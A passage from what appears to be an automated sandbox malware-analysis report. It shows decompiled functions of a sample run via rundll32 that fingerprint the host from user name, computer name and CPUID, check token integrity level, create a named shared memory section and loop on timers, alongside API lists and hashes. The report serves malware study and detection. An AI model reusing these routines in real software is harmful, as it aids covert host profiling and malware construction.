					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4fdd26c; // 0x3d0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4fdd24c = 5;
						} else {
							_t68 = E04FD68CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4fdd260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E04FD9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E04FD54AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4fdd244);
							goto L21;
						} else {
							__eflags =  *0x4fdd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04FD6106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4fdd248);
								L21:
								L04FDB088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x4fdd238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x04fd9b6f
                                          0x04fd9b85
                                          0x04fd9b89
                                          0x04fd9b8e
                                          0x04fd9b95
                                          0x04fd9b9b
                                          0x04fd9ba1
                                          0x04fd9d29
                                          0x04fd9ba7
                                          0x04fd9ba7
                                          0x04fd9ba9
                                          0x04fd9bae
                                          0x04fd9baf
                                          0x04fd9bb5
                                          0x04fd9bb9
                                          0x04fd9bbd
                                          0x04fd9bcb
                                          0x04fd9bd9
                                          0x04fd9bdd
                                          0x04fd9bdf
                                          0x04fd9bec
                                          0x04fd9bf8
                                          0x04fd9bfa
                                          0x04fd9c00
                                          0x04fd9c09
                                          0x04fd9c14
                                          0x04fd9c14
                                          0x04fd9c0b
                                          0x04fd9c0b
                                          0x04fd9c12
                                          0x00000000
                                          0x00000000
                                          0x04fd9c12
                                          0x04fd9c1e
                                          0x00000000
                                          0x04fd9c22
                                          0x04fd9c27
                                          0x04fd9c32
                                          0x04fd9c32
                                          0x04fd9c3a
                                          0x04fd9c45
                                          0x04fd9c4d
                                          0x04fd9c56
                                          0x04fd9c59
                                          0x04fd9c5d
                                          0x04fd9c62
                                          0x04fd9c68
                                          0x00000000
                                          0x00000000
                                          0x04fd9c6a
                                          0x04fd9c6e
                                          0x04fd9c72
                                          0x04fd9c75
                                          0x00000000
                                          0x04fd9c77
                                          0x04fd9c87
                                          0x04fd9c87
                                          0x00000000
                                          0x04fd9cb8
                                          0x04fd9cb8
                                          0x04fd9cbd
                                          0x04fd9cdc
                                          0x04fd9cde
                                          0x04fd9ce3
                                          0x04fd9ce4
                                          0x00000000
                                          0x04fd9cbf
                                          0x04fd9cbf
                                          0x04fd9cc5
                                          0x00000000
                                          0x04fd9cc7
                                          0x04fd9cc7
                                          0x04fd9ccc
                                          0x04fd9cce
                                          0x04fd9cd3
                                          0x04fd9cd4
                                          0x04fd9cea
                                          0x04fd9cea
                                          0x04fd9cf2
                                          0x04fd9d00
                                          0x04fd9d04
                                          0x04fd9d10
                                          0x04fd9d12
                                          0x04fd9d16
                                          0x04fd9d18
                                          0x00000000
                                          0x04fd9d1e
                                          0x00000000
                                          0x04fd9d1e
                                          0x04fd9d18
                                          0x04fd9cc5
                                          0x00000000
                                          0x04fd9cbd
                                          0x04fd9c8b
                                          0x04fd9c8d
                                          0x04fd9c91
                                          0x04fd9c92
                                          0x04fd9c92
                                          0x04fd9c96
                                          0x04fd9ca0
                                          0x04fd9ca0
                                          0x04fd9ca6
                                          0x04fd9ca9
                                          0x04fd9ca9
                                          0x04fd9cb0
                                          0x04fd9cb0
                                          0x04fd9d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04FD9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04FD9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04FD9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04FD9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?), ref: 04FD9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000), ref: 04FD9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000,?,?), ref: 04FD9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04FD9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04FD9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04FD9D10
                                            • Part of subcall function 04FD68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,07529388,00000000,?,7519F710,00000000,7519F730), ref: 04FD691E
                                            • Part of subcall function 04FD68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,075293C0,?,00000000,30314549,00000014,004F0053,0752937C), ref: 04FD69BB
                                            • Part of subcall function 04FD68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04FD9C10), ref: 04FD69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FD4AC4,?,00000000,?,?), ref: 04FD9D23
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 80a72a67d9a1efa0e86f4f7c0ba488e1a4081f39d96c3548742b8b54120b84c9
                                          • Instruction ID: ecd39d707230d1cbbd864d857644d09c992f04e1b98d87cfd3507ddc5fd9434a
                                          • Opcode Fuzzy Hash: 80a72a67d9a1efa0e86f4f7c0ba488e1a4081f39d96c3548742b8b54120b84c9
                                          • Instruction Fuzzy Hash: 6351BDB1409325AFD720AF65DC44DABBBEAEF85724F448A1DF8A4D2140D7B0E905CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD1A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04FD1A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04FDB082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4fdd2a4; // 0x254a5a8
				_t5 = _t13 + 0x4fde836; // 0x7528dde
				_t6 = _t13 + 0x4fde59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04FDAD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4fdd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04fd1a4e
                                          0x04fd1a56
                                          0x04fd1a5a
                                          0x04fd1a60
                                          0x04fd1a65
                                          0x04fd1a6a
                                          0x04fd1a6d
                                          0x04fd1a70
                                          0x04fd1a75
                                          0x04fd1a76
                                          0x04fd1a79
                                          0x04fd1a7e
                                          0x04fd1a85
                                          0x04fd1a8f
                                          0x04fd1a91
                                          0x04fd1a92
                                          0x04fd1a95
                                          0x04fd1ab1
                                          0x04fd1ab7
                                          0x04fd1abb
                                          0x04fd1b09
                                          0x04fd1abd
                                          0x04fd1aca
                                          0x04fd1ada
                                          0x04fd1ae2
                                          0x04fd1af4
                                          0x04fd1af8
                                          0x00000000
                                          0x00000000
                                          0x04fd1ae4
                                          0x04fd1ae7
                                          0x04fd1aec
                                          0x04fd1aee
                                          0x04fd1aee
                                          0x04fd1acc
                                          0x04fd1ace
                                          0x04fd1afa
                                          0x04fd1afb
                                          0x04fd1afb
                                          0x04fd1aca
                                          0x04fd1b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?,?), ref: 04FD1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04FD1A70
                                          • _snwprintf.NTDLL ref: 04FD1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04FDD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04FD1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?), ref: 04FD1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04FD1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53), ref: 04FD1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04FD4996,?,?,4D283A53,?), ref: 04FD1B03
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: aed3293294ea111aa043d9fe75fb3d641aa1bf7db4f288433ddaa24c109f72af
                                          • Instruction ID: f8e2134d1039d83c0b03ee482a6ff5ef494ac86cc8cd04b38f735fe1e46012d8
                                          • Opcode Fuzzy Hash: aed3293294ea111aa043d9fe75fb3d641aa1bf7db4f288433ddaa24c109f72af
                                          • Instruction Fuzzy Hash: 6B21C376A41208BBD721EF78DD49F8937ABEF44701F194221F605E7180EA74E906DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD93D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4fd93d5-4fd93e9 140 4fd93eb-4fd93f0 139->140 141 4fd93f3-4fd9405 call 4fd6f89 139->141 140->141 144 4fd9459-4fd9466 141->144 145 4fd9407-4fd9417 GetUserNameW 141->145 146 4fd9468-4fd947f GetComputerNameW 144->146 145->146 147 4fd9419-4fd9429 RtlAllocateHeap 145->147 148 4fd94bd-4fd94e1 146->148 149 4fd9481-4fd9492 RtlAllocateHeap 146->149 147->146 150 4fd942b-4fd9438 GetUserNameW 147->150 149->148 151 4fd9494-4fd949d GetComputerNameW 149->151 152 4fd9448-4fd9457 HeapFree 150->152 153 4fd943a-4fd9446 call 4fd7cf7 150->153 154 4fd949f-4fd94ab call 4fd7cf7 151->154 155 4fd94ae-4fd94b7 HeapFree 151->155 152->146 153->152 154->155 155->148
                                          C-Code - Quality: 96%
                                          			E04FD93D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4fdd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04FD6F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4fdd2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4fdd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04FD7CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x4fdd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4fdd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04FD7CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x4fdd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x04fd93d5
                                          0x04fd93dd
                                          0x04fd93e1
                                          0x04fd93e4
                                          0x04fd93e9
                                          0x04fd93eb
                                          0x04fd93f0
                                          0x04fd93f0
                                          0x04fd93f6
                                          0x04fd93f8
                                          0x04fd9405
                                          0x04fd9466
                                          0x04fd9407
                                          0x04fd940c
                                          0x04fd9412
                                          0x04fd9417
                                          0x04fd9425
                                          0x04fd9429
                                          0x04fd9438
                                          0x04fd943f
                                          0x04fd9446
                                          0x04fd9446
                                          0x04fd9451
                                          0x04fd9451
                                          0x04fd9429
                                          0x04fd9417
                                          0x04fd9468
                                          0x04fd946e
                                          0x04fd9478
                                          0x04fd947a
                                          0x04fd947f
                                          0x04fd948e
                                          0x04fd9492
                                          0x04fd949d
                                          0x04fd94a4
                                          0x04fd94ab
                                          0x04fd94ab
                                          0x04fd94b7
                                          0x04fd94b7
                                          0x04fd9492
                                          0x04fd94c2
                                          0x04fd94c4
                                          0x04fd94c7
                                          0x04fd94c9
                                          0x04fd94cc
                                          0x04fd94cf
                                          0x04fd94d9
                                          0x04fd94dd
                                          0x04fd94e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04FD940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD9423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04FD9430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD9451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04FD9478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04FD948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04FD9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04FD94B7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: fd46ec856291b111214c7e4db4d84c80292939e461d6d0fd1490311c613acc55
                                          • Instruction ID: 061149cb30cef56d6816ce6130d4c3a22c9a80533a2f8357e755f42183b20449
                                          • Opcode Fuzzy Hash: fd46ec856291b111214c7e4db4d84c80292939e461d6d0fd1490311c613acc55
                                          • Instruction Fuzzy Hash: B23128B2A01209EFEB10DFB9EC80AAEB7FAFF44204F558569E505D7210D774EE029B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD53E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04FD53E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4fdd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04FD58BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04FD147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x04fd53f0
                                          0x04fd53f7
                                          0x04fd53fe
                                          0x04fd5412
                                          0x04fd541d
                                          0x04fd5435
                                          0x04fd5442
                                          0x04fd5445
                                          0x04fd544a
                                          0x04fd5455
                                          0x04fd5459
                                          0x04fd5468
                                          0x04fd546c
                                          0x04fd5488
                                          0x04fd5488
                                          0x04fd548c
                                          0x04fd548c
                                          0x04fd5491
                                          0x04fd5495
                                          0x04fd549b
                                          0x04fd549c
                                          0x04fd54a3
                                          0x04fd54a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04FD5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04FD5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04FD5445
                                          • CloseHandle.KERNEL32(00000000), ref: 04FD5495
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04FD5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04FD5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04FD5480
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 9179ca28be2b266af847655ae291f6832360e4939563f973bd7b124b18133b63
                                          • Instruction ID: 850ad55787d22bae2777882a4a530b85f453c8695eba15d271f0ffd2897cb1c5
                                          • Opcode Fuzzy Hash: 9179ca28be2b266af847655ae291f6832360e4939563f973bd7b124b18133b63
                                          • Instruction Fuzzy Hash: 8D213A75D0025CFFEB019FA4EC44EAEBBBAEB49304F0440A5E510A6251C7759E05EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4fda060-4fda0a6 SysAllocString 187 4fda0ac-4fda0d9 186->187 188 4fda1ca-4fda1ce 186->188 194 4fda0df-4fda0eb call 4fda872 187->194 195 4fda1c8 187->195 189 4fda1d9-4fda1dd 188->189 190 4fda1d0-4fda1d3 SafeArrayDestroy 188->190 192 4fda1df-4fda1e2 SysFreeString 189->192 193 4fda1e8-4fda1ee 189->193 190->189 192->193 194->195 198 4fda0f1-4fda101 194->198 195->188 198->195 200 4fda107-4fda12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 4fda133-4fda147 200->202 204 4fda149-4fda14d 202->204 205 4fda186-4fda18b 202->205 204->205 208 4fda14f-4fda166 StrStrIW 204->208 206 4fda18d-4fda192 205->206 207 4fda1bf-4fda1c4 205->207 206->207 209 4fda194-4fda19f call 4fd1295 206->209 207->195 210 4fda17d-4fda180 SysFreeString 208->210 211 4fda168-4fda171 call 4fd91b5 208->211 215 4fda1a4-4fda1a8 209->215 210->205 211->210 216 4fda173-4fda17b call 4fda872 211->216 215->207 217 4fda1aa-4fda1af 215->217 216->210 219 4fda1ba 217->219 220 4fda1b1-4fda1b8 217->220 219->207 220->207
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04FDA09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04FDA11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04FDA15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FDA180
                                            • Part of subcall function 04FD91B5: SysAllocString.OLEAUT32(04FDC298), ref: 04FD9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04FDA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FDA1E2
                                            • Part of subcall function 04FDA872: Sleep.KERNEL32(000001F4), ref: 04FDA8BA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 51ebd72220482a502ecb24905792e39588f62516752e99388d21ae3d7245e75c
                                          • Instruction ID: 4e7131c9883a88baca9e1faed4a5a10a94f2de9bdafe225c992f363b2514b0a6
                                          • Opcode Fuzzy Hash: 51ebd72220482a502ecb24905792e39588f62516752e99388d21ae3d7245e75c
                                          • Instruction Fuzzy Hash: 08513036900609AFDB01DFA8D844A9EB7B7FF88740B188969E515EB210EB35ED46CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD7C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4fd7c75-4fd7c88 223 4fd7c8f-4fd7c93 StrChrA 222->223 224 4fd7c8a-4fd7c8e 223->224 225 4fd7c95-4fd7ca6 call 4fd58be 223->225 224->223 228 4fd7ca8-4fd7cb4 StrTrimA 225->228 229 4fd7ceb 225->229 231 4fd7cb6-4fd7cbf StrChrA 228->231 230 4fd7ced-4fd7cf4 229->230 232 4fd7cd1-4fd7cdd 231->232 233 4fd7cc1-4fd7ccb StrTrimA 231->233 232->231 234 4fd7cdf-4fd7ce9 232->234 233->232 234->230
                                          C-Code - Quality: 54%
                                          			E04FD7C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04FD58BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4fdc28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4fdc28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x04fd7c80
                                          0x04fd7c84
                                          0x04fd7c86
                                          0x04fd7c87
                                          0x04fd7c8f
                                          0x04fd7c8f
                                          0x04fd7c93
                                          0x00000000
                                          0x00000000
                                          0x04fd7c8a
                                          0x04fd7c8b
                                          0x04fd7c8e
                                          0x04fd7c8e
                                          0x04fd7c9b
                                          0x04fd7ca0
                                          0x04fd7ca6
                                          0x04fd7cae
                                          0x04fd7cb4
                                          0x04fd7cb6
                                          0x04fd7cbb
                                          0x04fd7cbf
                                          0x04fd7cc1
                                          0x04fd7cc4
                                          0x04fd7ccb
                                          0x04fd7ccb
                                          0x04fd7cd1
                                          0x04fd7cd5
                                          0x04fd7cd8
                                          0x04fd7cd9
                                          0x04fd7cdb
                                          0x04fd7ce3
                                          0x04fd7ce7
                                          0x04fd7ce7
                                          0x04fd7cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,075295AC,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?), ref: 04FD7C8F
                                          • StrTrimA.KERNELBASE(?,04FDC28C,00000002,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53), ref: 04FD7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53,?), ref: 04FD7CB9
                                          • StrTrimA.SHLWAPI(00000001,04FDC28C,?,?,?,04FD4C85,075295AC,?,?,?,04FD4A8B,?,?,?,4D283A53,?), ref: 04FD7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
